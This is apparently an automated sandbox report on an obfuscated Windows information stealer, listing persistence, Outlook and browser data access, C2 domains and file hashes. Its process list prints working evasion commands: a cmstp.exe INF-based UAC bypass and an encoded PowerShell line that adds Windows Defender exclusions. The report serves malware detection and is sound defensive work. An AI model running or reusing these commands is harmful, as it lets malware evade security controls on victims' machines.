Malware Analysis Report

2024-11-13 17:37

Sample ID 241109-3yjsvaxpfk
Target 8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b
SHA256 8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b
Tags
agilenet collection discovery spyware stealer
score
7/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
7/10

SHA256

8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b

Threat Level: Shows suspicious behavior

The file 8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b was found to be: Shows suspicious behavior.

Malicious Activity Summary

agilenet collection discovery spyware stealer

Executes dropped EXE

Checks computer location settings

Obfuscated with Agile.Net obfuscator

Drops startup file

Reads user/profile data of web browsers

Reads WinSCP keys stored on the system

Accesses Microsoft Outlook profiles

Drops file in System32 directory

Enumerates physical storage devices

System Location Discovery: System Language Discovery

Unsigned PE

Browser Information Discovery

outlook_win_path

Suspicious behavior: EnumeratesProcesses

Kills process with taskkill

Suspicious use of AdjustPrivilegeToken

Suspicious use of SetWindowsHookEx

Suspicious use of WriteProcessMemory

outlook_office_path

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-09 23:55

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-09 23:55

Reported

2024-11-09 23:57

Platform

win7-20241010-en

Max time kernel

104s

Max time network

109s

Command Line

"C:\Users\Admin\AppData\Local\Temp\8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe"

Signatures

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe C:\Users\Admin\AppData\Local\Temp\8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe N/A

Obfuscated with Agile.Net obfuscator

agilenet
Description Indicator Process Target
N/A N/A N/A N/A

Reads WinSCP keys stored on the system

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Accesses Microsoft Outlook profiles

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe N/A
Key queried \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Office\17.0\Outlook\Profiles\Outlook C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Office\18.0\Outlook\Profiles\Outlook C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Office\19.0\Outlook\Profiles\Outlook C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe N/A
Key queried \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Office\19.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Office\18.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Office\19.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe N/A
Key queried \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Office\20.0\Outlook\Profiles\Outlook C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe N/A
Key queried \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe N/A
Key queried \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Office\18.0\Outlook\Profiles\Outlook C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Office\17.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe N/A
Key queried \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Office\17.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Office\18.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe N/A
Key queried \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe N/A
Key queried \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Office\20.0\Outlook\Profiles\Outlook C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe N/A
Key queried \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Office\17.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Office\17.0\Outlook\Profiles\Outlook C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe N/A
Key queried \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe N/A
Key queried \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe N/A
Key queried \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Office\18.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Office\19.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe N/A
Key queried \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Office\19.0\Outlook\Profiles\Outlook C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe N/A
Key queried \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\taskkill.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe N/A

outlook_office_path

Description Indicator Process Target
Key queried \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe N/A

outlook_win_path

Description Indicator Process Target
Key queried \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe

"C:\Users\Admin\AppData\Local\Temp\8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe"

\??\c:\windows\system32\cmstp.exe

"c:\windows\system32\cmstp.exe" /au C:\Users\Admin\A.inf

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -exec bypass [char]46+[char]40+[char]39+[char]123+[char]49+[char]125+[char]123+[char]48+[char]125+[char]123+[char]51+[char]125+[char]123+[char]50+[char]125+[char]39+[char]32+[char]45+[char]102+[char]32+[char]39+[char]100+[char]45+[char]77+[char]39+[char]44+[char]39+[char]65+[char]100+[char]39+[char]44+[char]39+[char]102+[char]101+[char]114+[char]101+[char]110+[char]99+[char]101+[char]39+[char]44+[char]39+[char]112+[char]80+[char]114+[char]101+[char]39+[char]41+[char]32+[char]45+[char]69+[char]120+[char]99+[char]108+[char]117+[char]115+[char]105+[char]111+[char]110+[char]80+[char]97+[char]116+[char]104+[char]32+[char]39+[char]67+[char]58+[char]92+[char]39+[char]59+[char]46+[char]40+[char]39+[char]123+[char]49+[char]125+[char]123+[char]48+[char]125+[char]123+[char]51+[char]125+[char]123+[char]50+[char]125+[char]39+[char]32+[char]45+[char]102+[char]32+[char]39+[char]100+[char]45+[char]77+[char]39+[char]44+[char]39+[char]65+[char]100+[char]39+[char]44+[char]39+[char]102+[char]101+[char]114+[char]101+[char]110+[char]99+[char]101+[char]39+[char]44+[char]39+[char]112+[char]80+[char]114+[char]101+[char]39+[char]41+[char]32+[char]45+[char]69+[char]120+[char]99+[char]108+[char]117+[char]115+[char]105+[char]111+[char]110+[char]69+[char]120+[char]116+[char]101+[char]110+[char]115+[char]105+[char]111+[char]110+[char]32+[char]39+[char]101+[char]120+[char]101+[char]39| .((gV '*mdr*').NAMe[3,11,2]-joIn'')

C:\Windows\system32\taskkill.exe

taskkill /IM cmstp.exe /F

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe

"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 poolfreshstep.com udp
RU 185.170.144.39:80 poolfreshstep.com tcp
US 8.8.8.8:53 fallback-01-static.com udp
MY 111.90.145.132:7708 fallback-01-static.com tcp
MY 111.90.145.132:7708 fallback-01-static.com tcp
US 8.8.8.8:53 poolfreshstep.com udp

Files

memory/2220-0-0x000007FEF5F03000-0x000007FEF5F04000-memory.dmp

memory/2220-1-0x0000000000D00000-0x0000000000D0C000-memory.dmp

memory/2220-2-0x000007FEF5F00000-0x000007FEF68EC000-memory.dmp

memory/2220-3-0x000000001B0C0000-0x000000001B1A0000-memory.dmp

memory/2220-4-0x000000001C760000-0x000000001CA42000-memory.dmp

C:\Users\Admin\A.inf

MD5 961df7710c27cd2a2452c11aa48ada24
SHA1 081694e0067918b8355efef2cf72ef52d82e44b0
SHA256 d3a48635568ef5d4c0a1c86b3f750f06362056807d39b9461cd053ca88ee7a41
SHA512 64f9e3950c01f000e70166c5cb783a0be77249f2c06c99e23a9ab05c6a3a92f18de2478592db3b3dd328c8e5af6abcdcf07c74b63c373b7a24bc336a80503aae

memory/2220-7-0x000007FEF5F00000-0x000007FEF68EC000-memory.dmp

memory/2220-8-0x000007FEF5F00000-0x000007FEF68EC000-memory.dmp

memory/2220-9-0x000007FEF5F00000-0x000007FEF68EC000-memory.dmp

memory/2220-10-0x000007FEF5F00000-0x000007FEF68EC000-memory.dmp

memory/2220-11-0x000007FEF5F00000-0x000007FEF68EC000-memory.dmp

memory/2220-16-0x0000000000540000-0x000000000055C000-memory.dmp

memory/2220-19-0x0000000000360000-0x0000000000368000-memory.dmp

memory/3032-21-0x0000000002490000-0x0000000002498000-memory.dmp

memory/2220-20-0x000007FEF5F03000-0x000007FEF5F04000-memory.dmp

memory/3032-18-0x000000001B290000-0x000000001B572000-memory.dmp

memory/2220-17-0x000000001ABD0000-0x000000001AC18000-memory.dmp

memory/2220-22-0x000007FEF5F00000-0x000007FEF68EC000-memory.dmp

memory/2220-23-0x000000001B330000-0x000000001B3D6000-memory.dmp

memory/2220-24-0x0000000000CC0000-0x0000000000CF4000-memory.dmp

memory/2220-25-0x000000001AC20000-0x000000001AC6A000-memory.dmp

memory/2220-26-0x0000000000B20000-0x0000000000B36000-memory.dmp

memory/2220-27-0x000007FEF5F00000-0x000007FEF68EC000-memory.dmp

memory/2220-28-0x000007FEF5F00000-0x000007FEF68EC000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe

MD5 d00a8f6a66f5fcaf18564b6f47831294
SHA1 d1ae07fd6267b53264f1764cc45aafbfe9f5f763
SHA256 a60e55b8c66eb98a300d09fbdbe932bdf53476b805f10be02e6a7f2acdee8039
SHA512 99937a6e5aeb1248c8c341e43a0747eb98f06f972b559690afa810787173b2eb00ac2b657fd6c82a25630b1a47ab343bbf0b4e7ee250c54e59c95fa7f6f94c27

memory/2220-35-0x000007FEF5F00000-0x000007FEF68EC000-memory.dmp

